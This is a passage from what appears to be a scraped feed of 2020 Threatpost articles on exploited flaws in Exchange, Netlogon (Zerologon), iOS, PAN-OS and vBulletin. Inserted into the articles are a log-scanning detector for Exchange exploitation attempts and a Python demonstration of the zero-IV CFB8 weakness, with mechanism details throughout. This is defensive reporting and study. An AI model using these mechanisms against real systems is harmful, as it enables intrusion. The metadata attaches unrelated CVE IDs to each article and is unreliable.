While the flaw was fixed as part of Microsoft’s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates, researchers warned [in a March advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors. Attacks [first started in late February](<https://www.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?utm_source=charge&utm_medium=social&utm_campaign=internal-comms>) and targeted “numerous affected organizations,” researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.

Brian Gorenc, director of vulnerability research and head of Trend Micro’s ZDI program (which was credited with discovering the flaw), told [Threatpost via email](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that while the vulnerability was labelled “important” in severity by Microsoft, researchers opine it should be treated as “critical.”

“That’s why we worked with Microsoft to get it patched through coordinated disclosure, and it’s why we provided defenders detailed information about it through our blog,” he said. “We felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.”

The patch management issues with Exchange servers extend beyond CVE-2020-0688. Sellers said his investigation revealed that over 31,000 Exchange 2010 servers have not been updated since 2012. And there are nearly 800 Exchange 2010 servers that have never been updated, he said.

Sellers urged admins to verify that an update has been deployed. He also said users can determine whether anyone has attempted to exploit the vulnerability in their environment: “Since exploitation requires a valid Exchange user account, any account tied to these attempts should be treated as compromised,” Sellers said.

> If your org uses Microsoft Exchange I *strongly* recommend you make sure the patch for CVE-2020-0688 (Feb 11) is installed.
>
> Unpatched means phished user = SYSTEM on OWA servers. [@Rapid7](<https://twitter.com/rapid7?ref_src=twsrc%5Etfw>) Project Sonar found at least 357,629 unpatched hosts.
>
> Blog post: <https://t.co/DclWb3T0mZ>
>
> — Tom Sellers (@TomSellers) [April 6, 2020](<https://twitter.com/TomSellers/status/1247215382773018624?ref_src=twsrc%5Etfw>)

“The most important step is to determine whether Exchange has been updated,” Sellers said. “The update for CVE-2020-0688 needs to be installed on any server with the Exchange Control Panel (ECP) enabled. This will typically be servers with the Client Access Server (CAS) role, which is where your users would access Outlook Web App (OWA).”
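One way to act on Sellers' advice that any account tied to an exploitation attempt should be treated as compromised, as an added example (not Rapid7's or Microsoft's tooling): scan the IIS logs of the CAS/OWA servers for the request shape the public exploit uses, an authenticated request to /ecp/ that carries the ViewState in the query string, and report the cs-username behind each hit. Ordinary ECP pages submit ViewState as a POST body field, so a ViewState in the query string of an /ecp/ request is the signal. The W3C field layout in the `#Fields:` header and the log lines themselves are constructed for this example.

```python
"""Added example: flag CVE-2020-0688 exploitation attempts in IIS W3C logs.

Illustrative code written for this article, not vendor tooling. It assumes
the field order given in the constructed '#Fields:' header below and the
publicly described exploit shape (ViewState parameters in the query string
of an authenticated /ecp/ request).
"""
import urllib.parse
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample, not a real log: two attempts from an external address
# using bob's credentials; alice and carol show normal OWA/ECP traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-03-02 10:14:03 10.0.0.5 GET /owa/ - 443 CONTOSO\\alice 10.0.0.41 200
2020-03-02 10:15:21 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEPDwUKLTk0NDI2MjY3OQ9kZA%3D%3D 443 CONTOSO\\bob 203.0.113.9 500
2020-03-02 10:15:22 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEPDwUKLTk0NDI2MjY3OQ9kZA%3D%3D 443 CONTOSO\\bob 203.0.113.9 500
2020-03-02 10:16:40 10.0.0.5 GET /ecp/default.aspx - 443 CONTOSO\\carol 10.0.0.52 200
2020-03-02 10:17:05 10.0.0.5 POST /ecp/default.aspx - 443 CONTOSO\\carol 10.0.0.52 200
"""

Hit = Tuple[str, str, str]  # (timestamp, client ip, HTTP status)

def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C lines into dicts keyed by the names in the #Fields header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows

def is_ecp_viewstate_request(row: Dict[str, str]) -> bool:
    """An /ecp/ request whose query string (not body) carries a ViewState."""
    if not row.get("cs-uri-stem", "").lower().startswith("/ecp/"):
        return False
    params = urllib.parse.parse_qs(row.get("cs-uri-query", ""))
    return any(name.lower() == "__viewstate" for name in params)

def find_suspect_accounts(log_text: str) -> Dict[str, List[Hit]]:
    """Map each account seen in a suspected attempt to its attempts."""
    hits: Dict[str, List[Hit]] = defaultdict(list)
    for row in parse_w3c(log_text):
        if is_ecp_viewstate_request(row):
            stamp = f"{row['date']} {row['time']}"
            hits[row["cs-username"]].append((stamp, row["c-ip"], row["sc-status"]))
    return dict(hits)

if __name__ == "__main__":
    for account, attempts in find_suspect_accounts(SAMPLE_LOG).items():
        print(f"{account}: {len(attempts)} attempt(s), first {attempts[0]}")
```

A 500 on such a request usually means the payload failed to deserialize (for instance because the server was already patched); a 200 does not mean the attempt failed, so every flagged account should be reset and the server examined for webshells regardless of status.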
Threatpost, published 2020-04-07: <https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/> (CVEs listed: CVE-2020-0688, CVE-2020-24400, CVE-2020-24407; CVSSv2 9.0, AV:N/AC:L/Au:S/C:C/I:C/A:C).

# Windows Exploit Released For Microsoft ‘Zerologon’ Flaw

Proof-of-concept (PoC) exploit code has been released for a Windows flaw which could allow attackers to infiltrate enterprises by gaining administrative privileges, giving them access to companies’ Active Directory domain controllers (DCs).

The vulnerability, dubbed “Zerologon,” is a privilege-escalation flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) with a CVSS score of 10 out of 10, making it critical in severity. The flaw was addressed in [Microsoft’s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>).
However, this week at least four public PoC exploits for the flaw were released on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>), and on Friday, researchers with Secura (who discovered the flaw) published technical details of the vulnerability.

“This attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,” said researchers with Secura, [in a Friday whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>). “The attack is completely unauthenticated: The attacker does not need any user credentials.”

The flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.

Specifically, the issue exists in the usage of AES-CFB8 encryption for Netlogon sessions. AES-CFB8 requires a fresh, unpredictable initialization vector (IV) for every message, so that the same input never encrypts to the same output twice and an attacker cannot guess his way through the authentication handshake. However, Netlogon’s ComputeNetlogonCredential function sets the IV to a fixed value of 16 zero bytes – not randomized – so the output becomes predictable: for an all-zero input, the computed credential is itself all zeros for roughly one session key in 256, and the attacker simply retries until that happens.

In a real-world attack, attackers could send a number of Netlogon messages in which various fields are filled with zeroes, allowing them to bypass these authentication measures and access and change the computer password of the domain controller that is stored in Active Directory (AD), researchers said.

“Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the [Domain Controller] itself) and set an empty password for that account in the domain,” according to Secura researchers.

(Figure: The Zerologon attack. Credit: Secura. <https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/15102209/microsoft-window-attack.png>)

Of note, in order to exploit this vulnerability, the attacker would need to launch the attack from a machine on the same local-area network (LAN) as their target – meaning they would already need a foothold inside the targeted network.

“A vulnerable client or DC exposed to the internet is not exploitable by itself,” according to researchers with Tenable [in an analysis of the flaw](<https://www.tenable.com/blog/cve-2020-1472-zerologon-vulnerability-in-netlogon-could-allow-attackers-to-hijack-windows>). “The attack requires that the spoofed login works like a normal domain login attempt. Active Directory (AD) would need to recognize the connecting client as being within its logical topology, which external addresses wouldn’t have.”

However, if attackers are able to exploit the flaw, they can impersonate the identity of any machine on a network when attempting to authenticate to the Domain Controller – enabling further attacks, including the complete takeover of a Windows domain, researchers said.

“In a hypothetical attack, one could use this vulnerability to deploy ransomware throughout an organization and maintain a persistent presence if cleanup and restoration efforts miss any additional malicious scripts,” said Tenable researchers. “Organizations with network-accessible backups could end up with a perfect storm if a ransomware group destroys backups to increase their likelihood of payout from the victim organization.”

With at least four PoC exploits [now available on GitHub](<https://github.com/risksense/zerologon>), security researchers and [U.S. government authorities](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>) alike are urging admins to ensure they apply Microsoft’s August patches. These patches address the problem by enforcing Secure Netlogon Remote Protocol (i.e. Netlogon signing and sealing) for all Windows servers and clients in the domain.

> Yeah, I can confirm that this public exploit for Zerologon (CVE-2020-1472) works. Anybody who has not installed the patch from August's Patch Tuesday already is going to be in much worse shape than they already were. <https://t.co/SWK2hUDOYc> <https://t.co/0SDFfageQC> [pic.twitter.com/Lg8auMdtVU](<https://t.co/Lg8auMdtVU>)
>
> — Will Dormann (@wdormann) [September 14, 2020](<https://twitter.com/wdormann/status/1305564045282598912?ref_src=twsrc%5Etfw>)

Microsoft for its part is addressing the vulnerability in a phased rollout.
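The zero-IV property that the attack relies on, as an added example (not Secura's PoC and not Netlogon's code): a faithful CFB8 mode driven by a stand-in block function. So that this runs with the standard library alone, the 16-byte block cipher is replaced by a keyed SHA-256 PRF, which is an assumption of the demo; the argument needs only CFB8's structure, not AES itself. With a zero IV and an all-zero 8-byte challenge, the shift register never changes, so every output byte is the same byte E(key, 0)[0] and the whole credential is zero exactly when that single byte is zero, about one key in 256. With any non-zero IV the register shifts each step and an all-zero credential needs eight independent one-in-256 events.

```python
"""Added example for the AES-CFB8 zero-IV flaw behind Zerologon (CVE-2020-1472).

Not Secura's proof of concept and not Netlogon's real code. The block cipher
is a stand-in (keyed SHA-256 PRF, assumed so the demo needs no third-party
package); the CFB8 mode itself is implemented as specified.
"""
import hashlib
from typing import Callable

BLOCK_SIZE = 16  # AES block size, which is also the CFB8 shift-register size

def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128: 16 pseudorandom bytes derived from key || block."""
    assert len(block) == BLOCK_SIZE
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes,
                 block_encrypt: Callable[[bytes, bytes], bytes] = toy_block_encrypt) -> bytes:
    """CFB8: per plaintext byte, encrypt the shift register, XOR the first
    output byte with the plaintext byte, then shift the ciphertext byte in."""
    if len(iv) != BLOCK_SIZE:
        raise ValueError("IV must be exactly one block")
    register = bytearray(iv)
    ciphertext = bytearray()
    for p in plaintext:
        c = block_encrypt(key, bytes(register))[0] ^ p
        ciphertext.append(c)
        register = register[1:] + bytes([c])
    return bytes(ciphertext)

ZERO_IV = bytes(BLOCK_SIZE)   # the fixed IV ComputeNetlogonCredential used
ZERO_CHALLENGE = bytes(8)     # the all-zero client challenge an attacker sends

def credential_is_zero(session_key: bytes, iv: bytes = ZERO_IV) -> bool:
    """True when the 8-byte credential for a zero challenge comes out all zeros."""
    return cfb8_encrypt(session_key, iv, ZERO_CHALLENGE) == bytes(8)

def hits_with_iv(n_keys: int, iv: bytes) -> int:
    """Count constructed sequential session keys that yield a zero credential."""
    keys = (k.to_bytes(BLOCK_SIZE, "big") for k in range(n_keys))
    return sum(credential_is_zero(k, iv) for k in keys)

def zero_iv_hit_rate(n_keys: int) -> float:
    """Fraction of keys hit under the zero IV: about 1/256, not 2**-64."""
    return hits_with_iv(n_keys, ZERO_IV) / n_keys

if __name__ == "__main__":
    print(f"zero IV:     hit rate {zero_iv_hit_rate(65536):.5f} (1/256 = {1/256:.5f})")
    print(f"non-zero IV: {hits_with_iv(65536, bytes(range(16)))} hits out of 65536")
```

This is why the fix is not a bigger key or a better cipher but enforcing signing and sealing on the Netlogon channel: the mode is sound, the IV handling is what made the credential guessable.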
The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n\u201cThe DCs will be placed in enforcement mode, which requires all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device,\u201d said Microsoft.\n
", "cvss3": {}, "published": "2020-09-15T15:59:40", "type": "threatpost", "title": "Windows Exploit Released For Microsoft \u2018Zerologon\u2019 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-15T15:59:40", "id": "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "href": "https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:36:18", "description": "Apple quietly pushed out a [small but important update](<https://support.apple.com/en-us/HT201222>) for operating systems across all of its devices, including a patch for a zero-day exploit used in an iPhone [jailbreak tool](<https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/>) released last week.\n\nIn its notes for the release, Apple says very little else about the patches overall that it pushed out Monday \u2014 for iOS (including 13.4.6 for HomePod) and iPadOS 13.5.1, watchOS 6.2.6, tvOS 13.4.6, and macOS 10.15.5 \u2014 other than that they provide \u201cimportant security updates\u201d that are \u201crecommended for all users.\u201d\n\nA further look at the [details](<https://support.apple.com/pt-pt/HT211214>) of the iPhone updates explains that the release addresses the bug tracked as CVE-2020-9859, used in the [Unc0ver jailbreak](<https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/>).
The impact of the vulnerability is that \u201can application may be able to execute arbitrary code with kernel privileges.\u201d The description of the fix is that \u201ca memory-consumption issue was addressed with improved memory handling.\u201d\n\nThe update comes less than a week after hackers released the Unc0ver jailbreak tool, which they said uses a zero-day exploit to break into any iPhone, even those running the latest iOS 13.5. The hackers did not disclose which unpatched iOS flaw they use in their new tool, but they lauded it as the first zero-day jailbreak for the iPhone platform since iOS 8. [Jailbreak tools](<https://threatpost.com/checkra1n-jailbreak-stirs-concerns/150182/>) take advantage of vulnerabilities in iOS to allow users root access and full control of their device, in order to load programs and code from outside of the Apple walled garden.\n\nHowever, one [report](<https://www.vice.com/en_us/article/dyz8nw/iphone-ios-ios13-jailbreak-uncover-unc0ver>) from Vice Motherboard last week said that the jailbreak takes advantage of a kernel vulnerability, which was subsequently identified as CVE-2020-9859.\n\nThe team behind the jailbreak tool said at the time that they expected Apple to find the flaw and release a patch for it, calling it the \u201cnature\u201d of the business, a hacker called [Pwn20wnd](<https://twitter.com/Pwn20wnd>) told Vice Motherboard.\n\nThe ability for a threat actor to execute arbitrary code with kernel privileges is indeed a critical security problem that Apple would want to patch as soon as possible once it\u2019s been discovered or exploited.
Kernel privileges give someone control over everything in the OS, so a hacker who uses this ability can basically take over, modify or access whatever data or functionality they choose to on someone\u2019s iOS device.\n\nSome pro-jailbreak Apple users on Twitter are encouraging users to skip the security update.\n\n\u201c_#iOS_ 13.5.1 does in fact patch the [#exploit](<https://twitter.com/hashtag/exploit?src=hashtag_click>) used for [#unc0ver](<https://twitter.com/hashtag/unc0ver?src=hashtag_click>).\u201d [tweeted](<https://twitter.com/AppleTerminal/status/1267525571128356864>) [Apple Terminal](<https://twitter.com/AppleTerminal>), an account that calls itself an \u201cindependent Apple news source.\u201d \u201cDO NOT UPDATE.\u201d\n\nOther Apple experts on Twitter encouraged people who don\u2019t want to jailbreak their iPhones to make sure they install the patch, also telling users that it fixes the latest Unc0ver jailbreak tool.\n\n\u201cApple released iOS 13.5 update fixing Zero Day exploit used by Unc0ver Jailbreak,\u201d tweeted [iRobin Pro](<https://twitter.com/iRobinPro>), an Apple expert and blogger with a YouTube channel. \u201cIf you are not going to jailbreak your iPhone or iPad, update immediately.\u201d\n
", "cvss3": {}, "published": "2020-06-02T13:53:14", "type": "threatpost", "title": "Apple Jailbreak Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9859"], "modified": "2020-06-02T13:53:14", "id": "THREATPOST:F547DC4A5DD1A7B486FE5B2CBD69648A", "href": "https://threatpost.com/apple-jailbreak-zero-day-patch/156201/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:34", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that foreign hackers are likely to exploit a newly disclosed, critical vulnerability in a raft of Palo Alto Networks firewalls and enterprise VPN appliances, which allows for device takeover without authentication.\n\nThe Department of Defense (DoD) arm that oversees cyberspace operations has advised that all devices affected by the flaw, CVE-2020-2021, be patched immediately. The vulnerability affects devices that use Security Assertion Markup Language (SAML), according to a [tweet](<https://twitter.com/CNMF_CyberAlert/status/1277674547542659074>) by the agency.\n\n\u201cForeign APTs will likely attempt exploit soon,\u201d U.S. Cyber Command tweeted. \u201cWe appreciate @PaloAltoNtwks\u2019 proactive response to this vulnerability.\u201d\n\nPalo Alto Networks on Monday [posted an advisory](<https://security.paloaltonetworks.com/CVE-2020-2021>) on the vulnerability, which affects the devices\u2019 operating systems (PAN-OS). The affected versions are PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL).
PAN-OS 7.1 is not affected.\n\nPalo Alto already has patched the issue in PAN-OS 8.1.15, PAN-OS 9.0.9, PAN-OS 9.1.3, and all later versions, which is why CISA is urging immediate updates to affected devices.\n\nThe vulnerability basically allows for authentication bypass, so threat actors can access the device without having to provide any credentials. However, hackers can only exploit the flaw when SAML authentication is enabled and the \u201cValidate Identity Provider Certificate\u201d option is disabled (unchecked), according to researchers.\n\nThis combination allows for \u201can unauthenticated network-based attacker to access protected resources\u201d through an \u201cimproper verification of signatures in PAN-OS SAML authentication,\u201d according to Palo Alto\u2019s alert.\n\n\u201cThe attacker must have network access to the vulnerable server to exploit this vulnerability,\u201d researchers added.\n\nPalo Alto provided [details](<https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u0000008UXK>) for how users of potentially affected devices can check if their device is in the configuration that allows for exploitation of the flaw.\n\n\u201cAny unauthorized access is logged in the system logs based on the configuration; however, it can be difficult to distinguish between valid and malicious logins or sessions,\u201d researchers added in the advisory.\n\nCISA doesn\u2019t typically issue a warning on just any security flaw in vendors\u2019 enterprise products. However, the agency\u2019s cause for concern seems to be that the vulnerability has been rated the highest score on the CVSSv3 severity scale\u2014a 10 out of 10.\n\nThis rating means it is easy to exploit and doesn\u2019t require advanced technical skills.
Attackers also don\u2019t need to have already infiltrated the device they target in order to exploit the flaw; they can do so remotely via the internet.\n\nUsers noted that they have been aware of the flaw for some time, so they also welcomed the fix from Palo Alto. \u201cThis was a great concern,\u201d [wrote](<https://twitter.com/Sihegee/status/1277677527943671809>) Twitter user [Sihegee USA / Social](<https://twitter.com/Sihegee>), who suggested that people using devices with Yahoo and AT&T email services might be particularly affected by the issue. \u201cAt least now we have a patch.\u201d\n\nWhen updating affected devices, people should ensure that the signing certificate for their SAML identity provider is configured as the \u201cIdentity Provider Certificate\u201d before upgrading, to ensure that users of the device can continue to authenticate successfully, according to Palo Alto.\n\nDetails of all actions required before and after upgrading PAN-OS are available from the company [online](<https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u0000008UXK>).\n
", "cvss3": {}, "published": "2020-06-30T13:48:47", "type": "threatpost", "title": "CISA: Nation-State Attackers Likely to Take Aim at Palo Alto Networks Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-2021", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-30T13:48:47", "id": "THREATPOST:14236108003AC6A3E1AB861A15ECA88F", "href": "https://threatpost.com/cisa-nation-state-attackers-palo-alto-networks-bug/157013/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:18:50", "description": "A security researcher has published proof-of-concept code to outsmart a patch issued last year for a zero-day vulnerability discovered in vBulletin, popular software for building online community forums.\n\nCalling a patch for the flaw a \u201cfail\u201d and \u201cinadequate in blocking exploitation,\u201d Austin-based security researcher Amir Etemadieh published details and examples of exploit code for the patched version \u2013 in Bash, Python and Ruby \u2013 in a post published [Sunday night](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>).\n\nOn September 23, 2019, an unidentified security researcher released [exploit code](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) for a flaw that allowed for PHP remote code execution in vBulletin 5.0 through 5.4, Etemadieh wrote.\n\nThe zero-day, [CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>), is called a pre-auth RCE bug, which can allow an attacker to run malicious code and take over forums without needing to authenticate on the sites that are under attack.\n\n\u201cThis bug (CVE-2019-16759) was labeled as a \u2018bugdoor\u2019
because of its simplicity by a [popular vulnerability broker](<https://twitter.com/cbekrar/status/1176803541047861249>) and was marked with a [CVSS 3.x score of 9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>) giving it a critical rating,\u201d he said in the post.\n\nA patch was issued two days later, Sept. 25, 2019, that \u201cseemed, at the time, to fix the proof of concept exploit provided by the un-named finder,\u201d Etemadieh said.\n\nIt appears that it didn\u2019t, however, as Etemadieh outlined how it can be bypassed in three separate proofs of concept (in Bash, Python and Ruby).\n\nThe key problem with the patch issued for the zero-day is related to how the vBulletin template system is structured and how it uses PHP, he wrote in the post.\n\n\u201cTemplates aren\u2019t actually written in PHP but instead are written in a language that is first processed by the template engine and then is output as a string of PHP code that is later run through an eval() during the \u2018rendering\u2019 process,\u201d according to the post. \u201cTemplates are also not a standalone item but can be nested within other templates, in that one template can have a number of child templates embedded within.\u201d\n\nThe patch is \u201cshort-sighted\u201d because it faces problems when encountering a user-controlled child template, Etemadieh wrote.
In this case, a parent template will be checked to verify that the routestring does not end with a widget_php route, Etemadieh said.\n\n\u201cHowever, we are still prevented from providing a payload within the widgetConfig value because of code within the rendering process, which cleans the widgetConfig value prior to the template\u2019s execution,\u201d he wrote in his post.\n\nEtemadieh goes on to show how another template that appears in the patch is \u201ca perfect assistant in bypassing the previous CVE-2019-16759 patch\u201d thanks to two key features: the template\u2019s ability to load a user-controlled child template, and the way it loads the child template by taking a value from a separately named value and placing it into a variable named \u201cwidgetConfig.\u201d\n\n\u201cThese two characteristics of the \u2018widget_tabbedcontainer_tab_panel\u2019 template allow us to effectively bypass all filtering previously done to prevent CVE-2019-16759 from being exploited,\u201d he wrote.\n\nIt\u2019s unclear if Etemadieh informed vBulletin before posting the workarounds; however, a [report](<https://www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/>) in ZDNet suggests that he did not. In any case, he did provide a quick fix for his bypass of the patch in his post, showing how to disable PHP widgets within vBulletin forums, which \u201cmay break some functionality but will keep you safe from attacks until a patch is released by vBulletin,\u201d he wrote.\n\nTo apply the fix, administrators should:\n\n 1. Go to the vBulletin administrator control panel.\n 2. Click \u201cSettings\u201d in the menu on the left, then \u201cOptions\u201d in the dropdown.\n 3. Choose \u201cGeneral Settings\u201d and then click \u201cEdit Settings.\u201d\n 4. Look for \u201cDisable PHP, Static HTML, and Ad Module rendering\u201d and set it to \u201cYes.\u201d\n 5. Click \u201cSave.\u201d\n\n
Online forums are a popular target for hackers because they typically have a wide and diverse user base and store a large amount of personally identifiable information about those users.\n\nIndeed, hackers wasted no time in using Etemadieh\u2019s bypass to try to hack into the forum at the DEF CON security conference, according to a [post on Twitter](<https://twitter.com/thedarktangent/status/1292813958332596224>) by DEF CON and Black Hat founder Jeff Moss. However, administrators quickly applied Etemadieh\u2019s advice to disable PHP to thwart the attack, he tweeted.\n\n\u201cDisable PHP rendering to protect yourself until patched!\u201d Moss advised.\n
", "cvss3": {}, "published": "2020-08-11T12:09:30", "type": "threatpost", "title": "Researcher Publishes Patch Bypass for vBulletin 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T12:09:30", "id": "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "href": "https://threatpost.com/researcher-publishes-bypass-for-patch-for-vbulletin-0-day-flaw/158232/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:23:09", "description": "Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.\n\nThe vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server, and was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates. However, researchers [in a Friday advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) said that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\n\u201cWhat we have seen thus far are multiple Chinese APT groups exploiting or attempting to exploit this flaw,\u201d Steven Adair, founder and president of Volexity, told Threatpost.
\u201cHowever, I think it is safe to say that this exploit is now in the hands of operators around the world and unfortunately some companies that have not patched yet or did not patch quickly enough are likely to pay the price.\u201d\n\nAttacks first started in late February and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leveraging the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\n## The Flaw\n\nAfter Microsoft patched the flaw in February, researchers with the Zero Day Initiative (ZDI), which first reported the vulnerability, [published further details](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) of the flaw and how it could be exploited. And, on March 4, Rapid7 published a module that incorporated the exploit into the Metasploit penetration testing framework.\n\nThe vulnerability exists in the Exchange Control Panel (ECP), a web-based management interface for administrators, introduced in Exchange Server 2010. Specifically, instead of having cryptographic keys that are randomly generated on a per-installation basis, all installations in the configuration of ECP have the same cryptographic key values. These cryptographic keys are used to provide security for ViewState (server-side data that ASP.NET web applications store in serialized format on the client).\n\nAccording to ZDI, an attacker could exploit a vulnerable Exchange server if it was unpatched (before Feb. 11, 2020), if the ECP interface was accessible to the attacker, and if the attacker has a working credential allowing them to access the ECP.
After accessing the ECP using compromised credentials, attackers can take advantage of the fixed cryptographic keys by tricking the server into deserializing maliciously crafted ViewState data, then allowing them to take over Exchange server.\n\n\u201cWe realized the severity of this bug when we purchased it,\u201d Brian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program told Threatpost via email. \u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog. We felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\n## Brute Force\n\nResearchers said, while an attacker would need a credential to leverage the exploit, the credential does not need to be highly privileged or even have ECP access.\n\nAfter technical details of the flaw were disclosed, researchers said they observed multiple APT groups attempting to brute force credentials by leveraging Exchange Web Services (EWS), which they said was likely an effort to exploit this vulnerability.\n\n\u201cWhile brute-forcing credentials is a common occurrence, the frequency and intensity of attacks at certain organizations has increased dramatically following the vulnerability disclosure,\u201d researchers said.\n\nResearchers said they believe these efforts to be sourced from \u201cknown APT groups\u201d due to the overlap of their IP addresses from other, previous attacks. 
Also, in some cases, the credentials used were tied to previous breaches by the APT groups.\n\n## Going Forward\n\nIn the coming months, Adair told Threatpost, he suspects there could easily be hundreds of organizations being hit with this exploit.\n\n\u201cFrom our perspective the successful attacks we have seen are just a handful of different servers and organizations,\u201d Adair said. \u201cHowever, I would expect that attackers have been accessing compromised credentials all around the world and are not able to make better use of them.\u201d\n\nResearchers encourage organizations to ensure that they\u2019re up to date on security updates from Microsoft, as well as to place access control list (ACL) restrictions on the ECP virtual directory or via any web application firewall capability. Firms should also continue to expire passwords and require users to update passwords periodically, researchers said.\n\n\u201cThis vulnerability underscores such a case where an organization can be locked down, have properly deployed 2FA, and still have an incident due to an outdated or weak password,\u201d said researchers.\n
